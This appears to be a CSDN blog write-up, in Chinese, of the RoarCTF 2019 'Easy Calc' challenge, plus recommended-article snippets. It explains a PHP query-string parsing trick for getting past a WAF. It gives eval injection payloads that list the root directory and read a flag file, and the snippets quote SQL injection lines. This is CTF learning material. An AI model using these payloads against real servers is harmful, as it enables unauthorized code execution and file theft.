[RoarCTF 2019]Easy Calc

最新推荐文章于 2023-10-26 15:06:40 发布
最新推荐文章于 2023-10-26 15:06:40 发布
阅读量1.3k 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104547615
版权

这道题没什么思路直接看了wp,有两种解法:

一,利用PHP的字符串解析特性Bypass:

参考文章:利用PHP的字符串解析特性Bypass
在这里插入图片描述
也就是说,在这道题中PHP解析时'num'=' num'='+num',认为它们是同一个变量。

但是waf只认'num'' num''+num'都不在范围内,这样就能绕过waf了。

所以
payload1:

scandir("/")函数读取目录,/被过滤所以换为chr(47)绕过。

? num=1;var_dump(scandir(chr(47)))

file()函数读取flag。

? num=1;var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述
payload2:

空格换为+。

?+num=1;var_dump(scandir(chr(47)))

?+num=1;var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

补充:这里的chr(47)也可以换为hex2bin(dechex(47))

dechex()函数把十进制数转换为十六进制数。hex2bin()函数把十六进制值的字符串转换为 ASCII字符。

二,http走私绕过WAF:

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Calc Easy-开源
05-29
【标题】"Calc Easy-开源"是一个开源软件项目,它提供了一个相当简单的快速计算器的实现。这个项目的重点在于它的开源特性,意味着源代码是公开的,任何人都可以查看、学习、修改或分发这个计算器的代码。开源软件的...
CRC_Calc .rar
12-04
CRC_Calc是一个专门用于计算CRC值的软件工具,它支持多种CRC算法,能够帮助用户快速、准确地对数据进行校验。 CRC_Calc v0.1是这个压缩包中的主要程序,它可能是一个命令行工具或者具有图形用户界面的应用,使得非...
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1380
BUUCTF [RoarCTF 2019]Easy Calc1 WP
[RoarCTF 2019]Easy Calc1
最新发布
whale_waves的博客
10-26 112
这里有个小考点 script语句限制了get传参接收的num参数,如果传入的不是数字就不给访问calc.php文件的权限,就不能利用到calc.php里的函数eval来输出 这里通过php的性质绕过 空格在传入后会变为下划线 '_' 例如如果传入参数/calc.php?%20num=abc,可以绕过script语句做的waf(就像是我要的是这个num但是你给我的是_num我就不干了),但是php就可以正常识别
RoarCTF 2019 Easy Calc
BlueDoorZz的博客
07-11 331
0x00 题目类型:php,RCE。 知识点:php对变量空格的解析。 0x01 查看源码,提醒有WAF保护,不过我们不知道规则。发现calc.php,对传入的num参数做了如下限制。 $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) {
[RoarCTF 2019]Easy Calc 1
tomatoff的博客
05-12 2584
1、进入页面,还是一个输入页面: 2、常规三板斧: (1)输入1: (2)输入1’: (3)输入1": 3、发现没有报错,应该是思路错了,再打开源码试试: 4、下面提到了一个calc.php的页面,访问这个页面,blacklist中是过滤的字符: 5、这边知道传参只能为数字,于是参考[RoarCTF 2019]Easy Calc, 了解payload的构建; 6、构建函数 /calc.php? num=2;var_dump(scandir(chr(47))) 其中var_dump()用来打印;
BUUCTF [RoarCTF 2019]Easy Calc
qq_53030229的博客
11-09 818
文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过 一、 [RoarCTF 2019]Easy Calc 1、检查源码        1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行        2、检查源码,发现了calc.php,打开     
BUUCTF [RoarCTF 2019] Easy calc
qq_43039823的博客
07-28 235
Chr("0") 为0的字符 Chr("1") Chr("2") Chr("3") Chr("4") Chr("5") Chr("6") Chr("7") 响铃 Chr("8") 回格 Chr("9") tab(水平制表符) Chr("10") 换行 Chr("11") tab(垂直制表符) Chr("12") 换页 Chr("13") 回车 chr(13)&chr(10) 回车和换行的组合 Chr("14") Chr("15") Chr("16") Chr("17
win32calc简繁版
09-07
《Win32calc简繁版:回归计算器的本质》 在数字化时代,计算器早已从实体桌面工具变成了电脑系统中不可或缺的一部分。Windows操作系统自带的计算器作为一款基础的计算工具,陪伴了无数用户的学习与工作。然而,随着...
sm.rar_calc
09-14
"sm.rar_calc" 是一个程序,它专门用于执行符号法(Symplex Method)的计算。符号法,又称单纯形法,是一种线性规划问题求解的优化算法,由美国数学家乔治·丹齐格在1947年提出。线性规划是运筹学的一个重要分支,...
my_calc.rar_calc
09-24
而“rar_calc”则可能表明这个项目是以RAR压缩格式存储,且包含一个名为“calc”的特定部分或文件,这通常是源代码、可执行文件或者相关的配置文件。 Delphi7作为Windows应用程序的主要开发工具,它提供了直观的...
BUUCTF[强网杯 2019]随便注 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便注 1’ or 1=1 #
CTFSHOW-WEB入门-SQL注入
qq_44657899的博客
05-29 8682
文章目录前言web171web172web173web174web175 前言 最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一些新姿势。 web171 直接union注入即可 # 判断列数 ' order by 3 --+ # 查数据库名 ' union select 1,2,database() --+ # 查表名 ' union select 1,2,concat(table_name) from information_schema.tables
XCTF 攻防世界 MISC杂项 高手进阶区
qq_44657899的博客
02-05 5320
文章目录MISCall神奇的Modbus(送分)embarrass(送分)Training-Stegano-1(送分)Test-flag-please-ignore(16进制转字符)stage1(图片隐写,反编译)Hear-with-your-Eyes(音频隐写-频谱图) MISCall 神奇的Modbus(送分) 日期:2020/02/04 题目说了Modbus,百度了一下是一个通讯协议。 先...
[网鼎杯 2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4599
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
ctfshow-反序列化
qq_44657899的博客
08-25 4272
文章目录web254web255web256web257web258 web254 正常传参即可index.php?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } $a = new ctfShowUser(); echo urlencod
BUUCTF-[SUCTF 2019]EasySQL
qq_44657899的博客
02-27 3802
打开题目, 测试发现过滤了很多字符,不过可以堆叠注入: 1;show tables;# 然后尝试读取表Flag, 发现union,prepare,handler等都过滤了,基本我会的方法都过滤了。。。 看了看wp,说是比赛时题目泄露了源码 select $_GET['query'] || flag from flag 然后有两种解 解题思路1: payload:*,1 查询语句:selec...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值